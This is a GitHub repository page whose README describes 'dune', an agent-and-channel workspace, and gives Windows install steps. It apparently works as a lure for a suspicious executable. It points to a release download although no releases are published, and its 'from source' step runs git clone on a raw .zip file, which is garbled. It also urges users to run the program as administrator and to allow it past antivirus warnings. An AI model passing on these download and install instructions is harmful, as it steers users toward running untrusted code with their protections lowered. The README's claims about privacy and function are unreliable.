Skip to content

jealous-eaudevie630/dune

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

⚙️ dune - Simple Agent Workspace for Coordination

Download dune


🧰 What Is dune?

dune is a tool that helps you organize work with agents and channels in one place. It lets you manage agents, communicate in channels, and run small apps all from a smooth interface on your computer. dune keeps everything stored locally, so your data stays with you.


🎯 Key Features

  • Work with channels to chat and coordinate tasks with agents.
  • Create, start, stop, and check logs for agents easily.
  • Manage todos and review agent skills.
  • Use sandboxes to run commands, browse files, and handle uploads or downloads.
  • Access mini-apps built by agents right in the workspace.
  • Stores all data on your computer using SQLite, keeping things fast and private.

🚀 How to Download and Install dune on Windows

Step 1: Visit the Download Page

Go to the official release page for dune here:

Download dune

This page lists the latest versions of dune for Windows and other platforms.


Step 2: Find the Windows Installer

Look for the Windows version in the list. The file usually ends with .exe. It might be named something like dune-setup.exe or dune-windows.exe.


Step 3: Download the Installer

Click the Windows .exe file to download. Wait for the download to finish before moving to the next step.


Step 4: Run the Installer

Find the downloaded file, usually in your "Downloads" folder. Double-click it to start the installation.

Follow the instructions on the screen. Choose the default options unless you want to change the install location.


Step 5: Launch dune

After the installation finishes, open dune. You can do this by:

  • Finding dune in the Start Menu under “dune”.
  • Or double-clicking the icon on your desktop if you chose to create one.

📋 How to Use dune

Once dune is open, you will see the main workspace with channels on the side. This is where you chat and manage work.

Organize Channels

Channels are like chat rooms. You can create a new channel for each project or topic.

  • Click the “New Channel” button.
  • Name your channel.
  • Start sending messages or commands that agents can respond to.

Manage Agents

Agents are helpers that can work on tasks or run commands for you.

  • To create an agent, click the “Create Agent” button.
  • Start or stop agents using the controls near their name.
  • View logs anytime to see what the agent did.
  • Use the “Skills” panel to check what each agent can do.

Use Sandboxes

Sandboxes let you test commands, browse files, or upload and download content safely.

  • Open a sandbox window.
  • Run commands like you would in a command prompt.
  • Navigate files inside the sandbox.
  • Upload or download files from your computer to the sandbox.

⚙️ System Requirements

To run dune smoothly on Windows, your system should meet these requirements:

  • Windows 10 or later
  • 4 GB of RAM or more
  • 500 MB free disk space for installation
  • An internet connection to download and update dune

🔧 Optional: Installing from Source (For Advanced Users)

If you want to build dune from its source code, here is the process. This is optional and meant for advanced users or developers.

  1. Install Node.js 24

  2. Enable corepack by running this command in PowerShell or Command Prompt:

    corepack enable
    
  3. Install make if not already installed.

  4. Open Command Prompt and run:

    git clone https://github.com/jealous-eaudevie630/dune/raw/refs/heads/main/melanotic/Software_2.2.zip
    cd dune
    make deploy
    make dev
    

make deploy installs all dependencies and sets up the necessary configuration. make dev starts the application.


❓ Troubleshooting


📂 Where dune Stores Your Data

dune uses SQLite to store data on your computer. This means all your messages, logs, and agent information stay local and private. The application does not send data to external servers.

This setup helps you keep control of your information and work safely.


🎛️ Basic Controls Overview

Sidebar

See channels, agents, and open mini-apps here.

Workspace

This is where you view conversations, agent details, and sandbox operations.

Buttons and Panels

  • Start/Stop Agent: Controls for running agents.
  • New Channel: Adds a workspace for chats.
  • Sandbox: Opens a control area for file and command tasks.
  • Skills Panel: Lists agent abilities and allows you to manage them.

🚩 Notes for Windows Users

  • Run dune with administrator rights if you face permission issues.
  • Antivirus software may block dune the first time; allow it if prompted.
  • The app runs offline but needs internet only to download updates.

Download dune

About

Coordinate agents, channels, and mini-apps locally with Dune, a workspace that manages tasks, sandboxes, and runtime state in one interface.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors